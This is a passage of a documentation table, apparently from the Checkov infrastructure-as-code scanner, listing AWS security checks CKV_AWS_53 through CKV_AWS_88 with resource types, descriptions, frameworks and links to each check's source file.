+| 266 | CKV_AWS_53 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public ACLs enabled | Cloudformation | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicACLs.py) |
+| 267 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) |
+| 268 | CKV_AWS_54 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public policy enabled | Cloudformation | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicPolicy.py) |
+| 269 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) |
+| 270 | CKV_AWS_55 | resource | AWS::S3::Bucket | Ensure S3 bucket has ignore public ACLs enabled | Cloudformation | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py) |
+| 271 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) |
+| 272 | CKV_AWS_56 | resource | AWS::S3::Bucket | Ensure S3 bucket has RestrictPublicBuckets enabled | Cloudformation | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3RestrictPublicBuckets.py) |
+| 273 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) |
+| 274 | CKV_AWS_57 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow WRITE permissions to everyone | Cloudformation | [S3PublicACLWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLWrite.py) |
+| 275 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
+| 276 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
+| 277 | CKV_AWS_58 | resource | AWS::EKS::Cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Cloudformation | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSSecretsEncryption.py) |
+| 278 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) |
+| 279 | CKV_AWS_59 | resource | AWS::ApiGateway::Method | Ensure there is no open access to back-end resources through API | Cloudformation | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py) |
+| 280 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) |
+| 281 | CKV_AWS_60 | resource | AWS::IAM::Role | Ensure IAM role allows only specific services or principals to assume it | Cloudformation | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py) |
+| 282 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) |
+| 283 | CKV_AWS_61 | resource | AWS::IAM::Role | Ensure AWS IAM policy does not allow assume role permission across all services | Cloudformation | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) |
+| 284 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) |
+| 285 | CKV_AWS_62 | resource | AWS::IAM::Group | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 286 | CKV_AWS_62 | resource | AWS::IAM::Policy | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 287 | CKV_AWS_62 | resource | AWS::IAM::Role | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 288 | CKV_AWS_62 | resource | AWS::IAM::User | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 289 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 290 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 291 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 292 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 293 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 294 | CKV_AWS_63 | resource | AWS::IAM::Group | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 295 | CKV_AWS_63 | resource | AWS::IAM::Policy | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 296 | CKV_AWS_63 | resource | AWS::IAM::Role | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 297 | CKV_AWS_63 | resource | AWS::IAM::User | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 298 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 299 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 300 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 301 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 302 | CKV_AWS_63 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 303 | CKV_AWS_64 | resource | AWS::Redshift::Cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Cloudformation | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterEncryption.py) |
+| 304 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) |
+| 305 | CKV_AWS_65 | resource | AWS::ECS::Cluster | Ensure container insights are enabled on ECS cluster | Cloudformation | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSClusterContainerInsights.py) |
+| 306 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) |
+| 307 | CKV_AWS_66 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group specifies retention days | Cloudformation | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py) |
+| 308 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) |
+| 309 | CKV_AWS_67 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail is enabled in all Regions | Cloudformation | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailMultiRegion.py) |
+| 310 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) |
+| 311 | CKV_AWS_68 | resource | AWS::CloudFront::Distribution | CloudFront Distribution should have WAF enabled | Cloudformation | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFEnabled.py) |
+| 312 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) |
+| 313 | CKV_AWS_69 | resource | AWS::AmazonMQ::Broker | Ensure Amazon MQ Broker should not have public access | Cloudformation | [AmazonMQBrokerPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py) |
+| 314 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) |
+| 315 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
+| 316 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
+| 317 | CKV_AWS_71 | resource | AWS::Redshift::Cluster | Ensure Redshift Cluster logging is enabled | Cloudformation | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterLogging.py) |
+| 318 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) |
+| 319 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) |
+| 320 | CKV_AWS_73 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) |
+| 321 | CKV_AWS_73 | resource | AWS::Serverless::Api | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) |
+| 322 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) |
+| 323 | CKV_AWS_74 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Cloudformation | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBEncryption.py) |
+| 324 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) |
+| 325 | CKV_AWS_75 | resource | 
aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) | +| 326 | CKV_AWS_76 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) | +| 327 | CKV_AWS_76 | resource | AWS::Serverless::Api | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) | +| 328 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | +| 329 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | +| 330 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) | +| 331 | CKV_AWS_78 | resource | AWS::CodeBuild::Project | Ensure that CodeBuild Project encryption is not disabled | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py) | +| 332 | CKV_AWS_78 | resource | aws_codebuild_project | 
Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) | +| 333 | CKV_AWS_79 | resource | AWS::EC2::LaunchTemplate | Ensure Instance Metadata Service Version 1 is not enabled | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py) | +| 334 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 335 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 336 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | +| 337 | CKV_AWS_80 | resource | AWS::MSK::Cluster | Ensure MSK Cluster logging is enabled | Cloudformation | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py) | +| 338 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) | +| 339 | CKV_AWS_81 | resource | AWS::MSK::Cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Cloudformation | 
[MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py) | +| 340 | CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | +| 341 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 342 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 343 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 344 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 345 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 346 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch 
Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 347 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 348 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 349 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 350 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) | +| 351 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | +| 352 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 353 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has Access Logging enabled | Terraform | 
[CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 354 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) | +| 355 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | +| 356 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | +| 357 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | +| 358 | CKV_AWS_88 | resource | [?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 359 | CKV_AWS_88 | resource | [?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 360 | CKV_AWS_88 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. 
| Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 361 | CKV_AWS_88 | resource | [].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 362 | CKV_AWS_88 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 363 | CKV_AWS_88 | resource | [].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 364 | CKV_AWS_88 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 365 | CKV_AWS_88 | resource | [].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 366 | CKV_AWS_88 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 367 | CKV_AWS_88 | resource | [].tasks[?"ec2_instance" != null][] | EC2 instance should not have public IP. 
| Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 368 | CKV_AWS_88 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 369 | CKV_AWS_88 | resource | [].tasks[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 370 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 371 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 372 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 373 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | +| 374 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. 
